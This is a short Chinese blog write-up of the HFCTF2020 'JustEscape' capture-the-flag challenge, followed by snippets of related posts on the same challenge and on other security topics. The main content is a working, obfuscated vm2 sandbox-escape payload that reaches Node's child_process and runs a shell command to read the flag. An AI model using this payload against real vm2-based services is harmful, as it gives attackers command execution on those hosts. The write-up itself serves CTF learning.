[HFCTF2020]JustEscape 记录

最新推荐文章于 2025-05-29 11:13:45 发布
最新推荐文章于 2025-05-29 11:13:45 发布
阅读量167 收藏
点赞数
分类专栏: WEB 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_63045593/article/details/124300793
版权
这篇博客探讨了一个PHP代码注入的实例,其中包含了条件判断和`eval`函数的使用。同时,文章还展示了利用JavaScript混淆技巧进行的沙盒逃逸尝试,包括修改对象原型、利用`Buffer.from`和`execSync`执行命令行操作来获取敏感信息。这揭示了Web应用程序中常见的安全风险及其防范措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<?php
if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) {
    $code = $_GET['code'];
    echo eval(code);
} else {
    highlight_file(__FILE__);
}
?>

输入Error().stack猜测是不是js

在这里插入图片描述

是VM2沙盒逃逸用payload直接打

(function (){
    TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return proc`}ess`}`)();
    try{
        Object.preventExtensions(Buffer.from(``)).a = 1;
    }catch(e){
        return e[`${`${`get_pro`}cess`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /flag`).toString();
    }
})()
BUUCTF-JustEscape
shawdow_bug的博客
07-16 449
Node.js 题目-- 沙盒绕过
编译器前端cpp示例代码
11-19
编译器前端cpp示例代码编译器前端cpp示例代码编译器前端cpp示例代码编译器前端cpp示例代码编译器前端cpp示例代码
[HFCTF2020]JustEscape
fmyyy1的博客
04-13 1231
场景 最低行提示不是php,测试过后发现是nodejs。 是vm2的沙箱逃逸问题。 github上有现成的poc https://github.com/patriksimek/vm2/issues/225 "use strict"; const {VM} = require('vm2'); const untrusted = '(' + function(){ TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor(
BUUCTF-[HFCTF2020]JustEscape
qq_24033605的博客
11-04 605
[HFCTF2020]JustEscape 题目说真的不是PHP吗? 十有八九不是,猜测可能是Java,结果是js。 用Error().stack,看一下报错信息。 报错显示是vm.js,考的vm沙箱逃逸。 POC参考: https://github.com/patriksimek/vm2/issues/225 payload1: (function (){ TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`$
第 五 周 write up [[HFCTF2020]JustEscape [BJDCTF2020]EasySearch HCTF-2018-Web-warmup]
tothemoon的博客
10-22 1827
我的博客:[http://tothemoon2019.github.io](https://tothemoon2019.github.io/2020/10/21/%E7%AC%AC%20%E4%BA%94%20%E5%91%A8%20write%20up%20%5B%5BHFCTF2020%5DJustEscape%5D/) 文章目录[HFCTF2020]JustEscape(VM沙箱逃逸)0x000x0112success[BJDCTF2020]EasySearch(shtml,ssi注入)ssi注入su
[HFCTF2020]JustEscape vm沙箱逃逸
scrawman的博客
11-29 693
[HFCTF2020]JustEscape 先用Error().stack测试一下,确定是vm.js 这个老哥写的沙箱逃逸https://github.com/patriksimek/vm2/issues/225 "use strict"; const {VM} = require('vm2'); const untrusted = '(' + function(){ TypeError.prototype.get_process = f=>f.constructor("return proces
HFCTF2020 web writeup
a3320315的博客
04-21 3141
easy_login just_escape 进入这个页面 然后显示的是一个php的任意代码执行的页面,但是经过测试,这个根本就是php,其实题目也有提示 我们输入Error().stack 可以根据回显得到,这是一个JS的vm2,而且经过测试许多关键字都被过滤 所以我们使用字符串拼接就可以了~~ 然后我们去网上找一下关于vm2的payload 所以最终的payload为: (function (...
BUU CTF web(四)
0xdawn的博客
05-11 6401
[HarekazeCTF2019]encode_and_encode <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob
WUST-CTF 2020 WriteUp
weixin_45883223的博客
03-30 3425
WUST-CTF 2020 WriteUp前言WebcheckinadminCV Maker朴实无华Crypto大数运算情书B@sebabyrsa佛说:只能四天MiscSpace ClubWelcome爬Find megirlfriendShopReverseCr0ssFunlevel1 前言 又一次被“面向萌新,题目友好”给骗了,我还是tcl。 Web checkin 打开链接发现要提交作者的名...
WEB安全--SQL注入--bypass技巧2
最新发布
m0_74800552的博客
05-29 268
sql注入将webshell写入服务器web目录中(需要知道物理路径)==> 服务器脚本提权 ==> 在蚁剑中执行系统命令。上传.dll/.so文件(需要知道物理路径)==> 进行系统提权(UDF) ==> 在数据库命令行执行系统命令。根据这一特性,我们可以尝试用普通的真假条件语句结合响应包中的内容去判断,可以将此sql时间盲注转化为类似布尔盲注的形式。某些复杂的正则或字符串处理函数在不同的输入下计算量不同,可造成微小但可检测的延迟。判断当前用户权限(至少需要有文件写权限)等待锁释放(通常可控制几秒)
网络安全防御指南:全方位抵御暴力破解攻击
Cyyyy_g的博客
05-28 747
在数字化时代,暴力破解攻击(爆破)是严峻的网络安全威胁。本文提出防御爆破的 “六重防护法则”: 强化认证机制:实施强密码策略,启用多因素认证(MFA),减少凭证依赖。 严格访问控制:限制登录尝试次数,结合 IP 与设备指纹管控,强化会话管理。 实时监测响应:通过日志分析和威胁情报识别异常,自动化封禁攻击源并溯源。 系统架构加固:减少攻击面,修复漏洞,分离管理员账户并最小化权限。 对抗自动化工具:识别工具特征,增加爆破成本,利用分布式防御对抗 IP 池。
第三届宁波技能大赛网络安全赛项样题
Aluxian_的博客
05-28 862
2025第三届宁波技能大赛网络安全赛项包含四大模块:A模块侧重理论技能与职业素养,B模块考察网络安全事件响应、数字取证调查和应用安全,C模块为CTF夺旗攻击赛,D模块为CTF夺旗防御赛。其中B模块要求选手分析服务器入侵事件,完成应急响应、操作系统取证、网络数据包分析和代码审计等任务;C模块通过Kali Linux攻击靶机发现漏洞;D模块则需加固堡垒服务器。竞赛禁止使用移动设备,要求保持环境完整,违规将扣分或取消成绩。比赛提供FTP服务器下载素材,各模块侧重不同网络安全实战技能。
二、网络安全常见编码及算法-(1)
bronze_s的博客
05-26 720
本文系统分类加密编码技术为四类:哈希算法、编码方式、加密算法和其他。哈希算法(如MD5、SHA-1)通过单向计算生成固定长度哈希值,用于数据校验但部分已不安全;编码方式(如Base64)可逆转换数据格式但不提供安全性;加密算法(如AES)通过密钥机制确保数据保密性;其他类(如Elasticsearch)则服务于特定应用场景。每类技术详细分析了核心目标、技术特点、安全性、可逆性、输出长度和典型应用场景,并针对常见算法(MD5、SHA-1、HMAC、Base64等)提供具体示例及识别特征。(149字)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值